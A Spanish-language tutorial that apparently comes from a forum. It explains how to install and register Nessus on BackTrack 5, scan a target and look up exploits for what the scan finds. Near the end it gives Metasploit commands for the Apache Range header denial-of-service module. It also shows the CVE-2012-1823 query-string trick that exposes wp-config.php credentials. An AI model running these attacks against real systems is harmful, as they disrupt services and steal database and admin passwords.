Nessus


Bueno comenzaremos definiendo que es Nessus: Nessus es un programa que escanea vulnerabilidades de diversos Sistemas Operativos (Windows - Linux - Mac - Solaris, etc...), ademas de encontrar errores de configuraciones y vulnerabilidades, ya sean por falta de actualización del S.O, puertos que pueden llevar a sesiones meterpreter, procesos Web o fallos en softwares instalados (Apache, Mysql, etc)

Ya saliendo un poco de lo teorico, vamos a lo practico, Nessus podemos encontrarlo tanto para Windows como Linux, yo en mi caso lo mostrare en Backtrack 5 vamos a encontar una vulnerabilidad por medio de una ip o tambien se puede hacer mediante una web obteniendo la ip mediante ping.


Como instalar Nessus


La descarga tanto como para Linux, Windows, Mac y otros en el siguiente Link: http://www.tenable.com/products/nessus/n...-agreement , damos en Agree y escogimos la descarga, en mi caso: Linux debian 32bit.

Vamos al backtrack y pones los siguientes codigos como se muestra en la imagen



Creamos nuestro login y password.




Luego de eso viene el paso de registrarse: http://www.tenable.com/products/nessus/n...ation-code - le damos en la opcion de usar nessus en su hogar. Al lado derecho pondremos nuestros datos y iremos a nuestro correo en el cual obtendremos el codigo para activar nuestro producto.




Ya con el codigo en nuestro poder nuevamente iremos a la consola y pondremos lo siguiente: /opt/nessus/bin/nessus-fetch --register (poner el codigo de activacion)





Luego para iniciar Nessus pondremos esto en consola: /etc/init.d/nessusd start, Luego de esto vamos a nuestro Navegador pondremos esta direccion : https://localhost:8834 y tendremos nuestro Nessus listo para realizar nuestras pruebas.









Ya en esta web nos vamos a logear con el usuario que creamos anteriormente, una vez dentro podremos crear un scan a alguna ip que sea nuestro objetivo a escanear, para no dejar todo inconcluso les dare un ejemplo de scaneo y como buscar la vulnerabilidad y explotarla.
Para crear un nuevo Analisis, vamos a la pestaña Scan y New Scan:




Pasados algunos minutos obtendremos los resultados y el Scan estara terminado por completo, asi como en la siguiente imagen:



Como se ve tenemos Vulnerabilidades ordenadas de acuerdo a su prioridad desde Criticas, Altas, Medias, Bajas etc. En nuestro ejemplo tomaremos las mas criticas
Daremos con la siguiente:
Apache 2.2 <2.2.13 apr_palloc abril de desbordamiento del montón.






La información nos dice que no cuenta con exploits disponibles, pero no solo podemo quedarnos con esto, entonces nos asistiremos de nuestro amigo GOOGLE y buscaremos la informacion empezando por ingresar el CPE: cpe :/ A: apache: http_server.

Y listo en primer lugar obtendremos la siguiente Web: http://www.security-database.com/cpe.php...er:1.3.41, la cual nos indica al final que si existe un Exploit disponible llamado Apache Range header DoS (Apache Killer):
$ msfconsole
msf > use auxiliary/dos/http/apache_range_dos
msf auxiliary(apache_range_dos) > set RHOST [TARGET IP]
msf auxiliary(apache_range_dos) > run

Eso ya es una vulnerabilidad encontrada, el denominado Apache Killer, y con la ayuda de nuestro amigo METASPLOIT.




Bueno entonces comenzaremos a buscar, empezaremos por el CVE-2012-1823, buscando un poco nos encontramos con la siguiente web: http://systemadmin.es/2012/05/bug-de-php-cve-2012-1823, la cual nos indica un bug php la cual nos permite ver los codigos de fuente de archivos comprometedores ya sea wp-config en Wordpress, config.php, conexion.php etc. Para poder testear la vulnerabilidad si es que la encontramos en algun testeo de seguridad y claro nos da Nessus como resulta que la web si cuenta con la vulne, la pondriamos asi:




Sitioweb.com/wp-config.php?-s (el cual nos mostraria el codigo de fuente, dejando a nuestros ojos toda la configuracion, user y password mysql, user y pass del panel de administracion y otras cosas interesantes, sin mas que decir, usen esta herramienta para su beneficio.